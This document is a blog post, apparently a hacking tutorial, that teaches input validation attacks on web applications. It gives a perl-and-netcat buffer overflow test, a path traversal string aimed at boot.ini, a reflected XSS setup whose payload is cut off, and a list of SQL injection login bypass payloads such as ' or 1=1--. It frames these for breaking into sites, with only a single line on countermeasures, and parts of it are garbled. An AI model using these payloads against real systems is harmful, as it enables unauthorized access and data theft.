-: Input Validation Attacks :-
Input Validation Attacks are where an attacker intentionally sends unusual input in the hopes of confusing the application.
The most common input validation attacks are as follows-
1) Buffer Overflow :- Buffer overflow attacks are enabled due to sloppy programming or mismanagement of memory by the application developers. Buffer overflow may be classified into stack overflows, format string overflows, heap overflows and integer overflows. It may possible that an overflow may exist in language’s (php, java, etc.) built-in functions.
To execute a buffer overflow attack, you merely dump as much data as possible into an input field. The attack is said to be successful when it returns an application error. Perl is well suited for conducting this type of attack.
Here’s the buffer test, calling on Perl from the command line:
$ echo –e “GET /login.php?user=\
> `perl –e ‘print “a” x 500’`\nHTTP/1.0\n\n” | \
nc –vv website 80
This sends a string of 500 “a” characters for the user value to the login.php file.
Buffer overflow can be tested by sending repeated requests to the application and recording the server's response.
2) Canonicalization :- These attacks target pages that use template files or otherwise reference alternate files on the web server. The basic form of this attack is to move outside of the web document root in order to access system files, i.e., “../../../../../../../../../boot.ini”. This type of functionality is evident from the URL and is not limited to any one programming language or web server. If the application does not limit the types of files that it is supposed to view, then files outside of the web document root are targeted, something like following-
/menu.asp?dimlDisplayer=menu.asp
/webacc?User.asp=login.htt
/SWEditServlet?station_path=Z&publication_id=2043&template=login.tem
/Getfile.asp?/scripts/Client/login.js
/includes/printable.asp?Link=customers/overview.htm
3) Cross-site Scripting (XSS) :- Cross-site scripting attacks place malicious code, usually JavaScript, in locations where other users see it. Target fields in forms can be addresses, bulletin board comments, etc.
We have found that error pages are often subject to XSS attacks. For example, the URL for a normal application error looks like this:
http://website/inc/errors.asp?Error=Invalid%20password
This displays a custom access denied page that says, “Invalid password”. Seeing a string
on the URL reflected in the page contents is a great indicator of an XSS vulnerability. The attack would be created as:
http://website/inc/errors.asp?Error=
-: SQL Injection Attacks :-
OR
You should look for pages like ASP, ASPX, JSP, CGI, or PHP. Try to look especially for URL that takes parameters, like: http://example.com/login.asp?id=10 Is it Vulnerable? Start with a single quote trick. Input something like: hi' or 1=1-- Into login, or password, or even in the URL. Example: Login: hi' or 1=1-- Pass: hi' or 1=1-- http://example.com/login.asp?id=hi' or 1=1-- You can do this with a hidden field, just view the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example: If luck is on your side, you will get login without any login name or password. But why ' or 1=1-- ? Take an asp page that will link you to another page with the following URL: http://example.com/search.asp?category=sports In this URL 'category' is the variable name and 'sports' is it's value. Here this request fires following query on the database in background. SELECT * FROM search WHERE category='sports' Where 'search' is the name of table which is already present in some database. So, this query returns all the possible entries from table 'search' which comes under the category 'sports'. Now, assume that we change the URL into something like this: http://example.com/search.asp?category=sports' or 1=1-- Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database something like: SELECT * FROM search WHERE category='sports' or 1=1--' The query should now select everything from the 'search' table regardless if category is equal to 'sports' or not. A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#". However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try ' or 'a'='a It should return the same result. Depending on the actual SQL query, you may have to try some of these possibilities: ' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a 'or''=' Countermeasures ? Filter out character like ' " - / \ ; NULL, etc. in all strings from: * Input from users * Parameters from URL * Values from cookie -: Google Hacking :-
Some of the most powerful and very effective google search queries are added on Google Dorks! page.
0 comments:
Post a Comment